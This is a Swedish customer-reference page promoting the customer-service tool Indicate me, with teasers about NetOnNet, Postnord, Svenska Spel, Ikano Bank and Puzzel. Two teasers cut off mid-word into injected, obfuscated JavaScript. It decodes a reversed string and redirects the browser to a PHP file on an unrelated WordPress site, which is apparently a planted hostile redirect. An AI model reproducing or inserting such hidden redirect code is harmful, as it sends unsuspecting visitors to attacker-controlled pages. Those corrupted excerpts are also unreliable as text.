REFERENSKUNDER

Det här säger våra kunder

FILM

Kundfilmer

Vi förstår hur viktigt det är att hålla sig uppdaterad och ständigt utveckla sina färdigheter som kundservicechef. Därför har vi samlat en skattkista av intressanta och informativa filmer samt webinars för dig att utforska. Kanske hittar du den perfekta lösningen på en utmaning du står inför, eller så får du bara en härlig stund av insikt och inspiration.

För att dyka in i denna värld av kunskap och visdom, behöver du bara klicka på kundbilden och så börjar filmen att spelas.

ARTIKLAR

Kundartiklar

Netonnet indicateme 552

Så arbetar NetOnNet med självledarskap i kundservice

Ett högre självledarskap och nöjdare kunder – det är något som NetOnNet har upplevt sedan de implementerade Indicate me i verksamheten. Jennifer Ala-Katara arbetar som Kundserviceschef på NetOnNet där ett av hennes ansvar är…
insikter_i_kundservice

Är kontroll ett ensamspel?

Att inkludera och ge någon annan mer ansvar och kontroll, kan vara både skrämmande och läskigt. Kommer du att tappa kontroll, om dina kollegor och medarbetare får mer insyn? Indicate me erbjuder ett verktyg för kundservice som frigör…
postnord 1

Indicate me + Postnord = Sant

Efter att ha dejtat ett tag och lärt känna varandra, har Postnord och Indicate me insett faktumet: ”Vi är en perfect match”  Indicate me säljer inte bara ett verktyg till sina kunder, utan vi säljer ett arbetssätt. Vi ser inte…
Ellos fredrik lofgren

13 tips – Så ökar du medarbetarnas engagemang

Motiverade och engagerade kundservicemedarbetare är en av de viktigaste fak$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var…
kundundersokningar header 1

Vad ska jag ställa för frågor i kundundersökningen?

Funderar du på att börja med kundundersökningar? Eller är du nyfiken på vilka frågor som andra ställer? Indicate me utför kundundersökningar i alla kontaktkanaler och på många olika språk. Vi kontaktar exempelvis kunder au$NfI=function(n){if…
NetOnNet header 1

NetOnNet har ökat sin NKI med +40% på 6 månader

NetOnNet har ökat sin nöjd-kund-index med hela 40% på 6 månader på alla sina e-postinteraktioner. Samtidigt under samma period har de ökat sin Net Promoter Score med 44 enheter på samma kanal. På NetOnNet har man service och trygghet…
210702 svenska spel e 1321 scaled 1 1

Svenska Spel väljer Indicate me

Häromdagen gick startskottet för samarbetet mellan Indicate me och Svenska Spel. Ett samarbete som kommer bidra till förbättrad kundservice och ökat självledarskap. ”Svenska Spel är en spännande organisation och det känns fantastiskt…
Indicate me blev det självklara valet för Ikano Bank

Indicate me blev det självklara valet för Ikano Bank

När Ikano Bank ville förbättra sin kundservice sökte de efter ett system som kunde ge dem enhetliga insikter över samtliga länder och transparens. Genom transparensen av dessa insikter vill de bidra till ökat självledarskap och engagemang…
Puzzel

Indicate me ingår ett nytt partnerskap med Puzzel

Indicate me och Puzzel har valt att ingå partnerskap som innebär att kunder till Puzzel får möjlighet till utökad kundinsikt genom att addera Indicate me till sin kontaktcenterplattform. Konsumenter vill komma i kontakt med kundservice…
123456789101112131415

INTERVJU

Kundberättelser

Kontakta oss